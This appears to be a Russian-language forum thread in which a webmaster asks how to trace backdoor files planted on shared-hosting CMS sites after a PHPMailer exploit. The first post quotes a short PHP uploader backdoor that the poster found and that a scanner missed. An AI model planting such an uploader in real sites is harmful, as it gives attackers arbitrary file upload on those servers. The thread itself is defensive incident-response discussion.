Z4masko Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Здравствуйте, подскажите пожалуйста: Есть шаред хостинг с неизолированными друг от друга сайтами. После обнаружения критической уязвимости в классе PHPMailer произошло заражение сайта(ов). Все сайты обновил, вычистил Ai-Bolit'ом, но к сожалению не все файлы Ai-Bolit помечает как подозрительные, например он пропускает PHP  файлы с следующим содержанием:   Код:   <?php if ($mode=='upload') {    if(is_uploaded_file($_FILES["filename"]["tmp_name"]))    {      move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);      echo $_FILES["filename"]["name"];    }   }   ?> Приходистся вручную искать подобные файлы среди тысячи стандартных файлов CMS (Joomla, Wordpress и т.д.)   Вычистил сайты все, но всё равно изредка, после моего сканирования на новые изменённые или созданные файлы, обнаруживается какой-нибудь один файл-бекдор. Ну например backdoor.php Вопрос в следующий, как бы в логах апача или другими средствами узнать каким скриптом был создан или залит файл "backdoor.php"? Всего записей: 735 | Зарегистр. 05-11-2004 | Отправлено: 19:43 06-03-2017

Z4masko Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Цитата: смотрим время создания файла, изучаем логи за этот промежуток.   Сейчас вредоносные скрипты пишут так, что время создания сайта делается такое же ,как и соседние в директории, так что это не помогает. Я вот файл (с помощью скрипта обнаружения новых файлов на хостинге) нашёл сегодня, а дата создания пишется как месяц назад Всего записей: 735 | Зарегистр. 05-11-2004 | Отправлено: 20:23 06-03-2017 | Исправлено: Z4masko, 20:23 06-03-2017

Z4masko Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Mavrikii не могли бы вы подсказать регулярное выражение для поиска лог файлов с помощью Total Commander, в которых содержится одновременно "POST" и "200" Это чтобы упростить поиск "левых" файлов ,с помощью которых через POST запросы заливаются файлы Всего записей: 735 | Зарегистр. 05-11-2004 | Отправлено: 22:27 06-03-2017

Z4masko Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Нашёл кстати хорошую инструкцию. Может кому пригодится: http://virus-killer.ru/ Всего записей: 735 | Зарегистр. 05-11-2004 | Отправлено: 22:37 15-04-2017

Z4masko Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору да ничего я не раскручиваю, нашёл в гугле сайт этот Всего записей: 735 | Зарегистр. 05-11-2004 | Отправлено: 00:30 16-04-2017

Компьютерный форум Ru.Board » Интернет » В помощь вебмастеру » Как найти скрипт через который создаются/загружаются файлы?

Переход по форумам  Закладки   » Компьютеры Цифровое изображение Программы Microsoft Windows UNIX Другие OS Hardware В помощь сисадмину Прикладное программирование Игры Форумные игры   » Интернет Web-программирование В помощь вебмастеру Графика Хостинг Зацените-ка!   » Тематические Ikonboard v.2 Ikonboard v.3 Invision Board Другие форумы PHP-Nuke и другие порталы Мобила   » Общие Спорт Флейм Темы по региональным встречам Музыка и Кино Юмор Литература и Живопись   » Ru.Board Новости Помощь по форуму   » Андеграунд eBookz Варезник Раздачи и акции Мобильный варезник Андеграунд Игры и фильмы   » Специальные Тестирование